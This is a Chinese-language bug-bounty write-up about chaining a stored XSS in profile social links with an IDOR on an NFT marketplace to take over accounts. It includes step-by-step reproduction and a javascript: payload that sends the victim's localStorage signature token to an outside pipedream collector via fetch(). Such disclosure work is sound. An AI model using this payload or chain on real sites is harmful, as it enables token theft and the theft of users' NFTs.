記一次NFT平臺的存儲型XSS和IDOR漏洞這是我在 NFT 市場中發現的一個令人興奮的安全問題,它允許我通過鏈接 IDOR 和 XSS 來接管任何人的帳戶,以實現完整的帳戶接管漏洞。

我們將用實際流程來覆蓋每個漏洞,然后將所有這些問題串聯起來

XSS →IDOR → 賬戶接管

我們先從XSS開始注意:我們將目標應用程序稱為vulnerablemarketplace.com

關于此應用程序:在此應用程序中,每個請求都通過簽名進行驗證,該簽名的作用類似于 cookie 或身份驗證標頭。

漏洞1:存儲型XSS與其他應用程序一樣,它有一個個人資料部分,用戶可以在其中上傳個人資料圖片/上傳藝術作品/更新個人簡介/電子郵件/添加 Instagram 或 Telegram 等社交鏈接


所以我做的最基本的步驟是將我的 Twitter 和 Instagram 鏈接保存為 javascript:alert(document.domain) ,當我保存我的信息并單擊 Twitter 或 Instagram 圖標時,javascript 被執行,這確認我們在nft 市場

復現步驟1.使用錢包登錄我的vulnerablemarketplace.com nft 帳戶

2.然后導航到我的個人資料設置并將我的 Instagram 和 Twitter 鏈接保存為 javascript:alert(document.domain)

這是帖子請求:


3.每當我們點擊我們的個人資料 Twitter 或 Instagram 圖標時,XSS 就會被執行


漏洞 2:idor 修改任何用戶的個人資料詳細信息關于漏洞:攻擊者可以修改用戶的個人資料信息,包括聯系電子郵件、Twitter 或 Instagram 鏈接,這里唯一的要求是我們需要獲取受害者的錢包地址(這已經是區塊鏈上的公開信息,因為每個用戶都共享一個錢包地址)某人或其他人)。

要求:受害者錢包地址(我們可以輕松獲得,因為用戶與其他用戶共享此地址,并且地址是公共信息)

復現步驟設置:我創建了兩個帳戶 A. 攻擊者 B. 受害者(復制受害者錢包地址)

1.攻擊者將他的錢包連接到vulnerablemarketplace.com

2.轉到他的個人資料設置并在電子郵件、Twitter 鏈接上輸入任何隨機信息,并在任何代理工具 (BURP) 中捕獲請求

3.從攻擊者的角度來看,此帖子請求中的一些參數非常有趣,包括 acccount_address、signer 和簽名。

account_address=用戶錢包地址

簽名者=與賬戶地址相同

簽名 = 充當身份驗證令牌或 cookie 來正確驗證用戶的請求

4.我將攻擊者的account_address修改為受害者的賬戶地址并發送請求


5.是的!!!我們能夠用我們自己的價值觀修改受害者用戶的個人資料。我們能夠使用我們自己的控制值修改受害者的電子郵件、Twitter、Instagram 鏈接

注意:有些人可能會有疑問,如果我們能夠修改受害者的電子郵件,那么帳戶就已經被接管了???不,因為這是一個 NFT 應用程序,所以沒有電子郵件身份驗證,我們必須使用錢包擴展進行連接(我們需要竊取受害者簽名,以便我們可以使用它來竊取 NFT 或藝術品)

打造漏洞利用鏈到目前為止,我們已經有了一個 IDOR 和一個 Stored XSS。我本可以與其他用戶共享我的個人資料來竊取數據,但通過鏈接此 IDOR,我們可以修改信譽良好的用戶的個人資料詳細信息以增加影響

需要記住的事情:應用程序沒有 cookie,但將簽名值存儲在瀏覽器 localStorage 中,因此我們將制作有效負載來竊取該簽名值

復現步驟1.在 Burp 等代理工具中捕獲更改個人資料信息的 POST 請求

2.修改此負載的 Instagram 和 Twitter 鏈接。

3.我們對簽名值特別感興趣,因為這是發出每個請求所必需的。簽名值存儲在 localStorage 中,因此這里是 javascript 有效負載,我們將使用它來竊取該值并將其發送到我們的 pipelinedream url javascript:token=JSON.stringify(localStorage),url='https://mypipedream.m.pipedream.net/'+token,fetch(url)

4.修改account_address為受害者錢包地址


5.請求并完成:) 一旦受害者點擊他的 Instagram 或 Twitter 鏈接或用戶訪問受害者用戶的個人資料,XSS 將被執行,用戶的簽名值將被泄露到我的服務器


現在您可以看到我們使用 XSS 竊取了受害者的簽名。現在我們可以提出任何其他請求來執行其他經過身份驗證的操作,例如出售藝術品或轉讓或刪除用戶的藝術品

漏洞披露


xss 漏洞挖掘 網絡安全 漏洞 twitter instagram
撤稿糾錯
本作品采用《CC 協議》,轉載必須注明作者和本文鏈接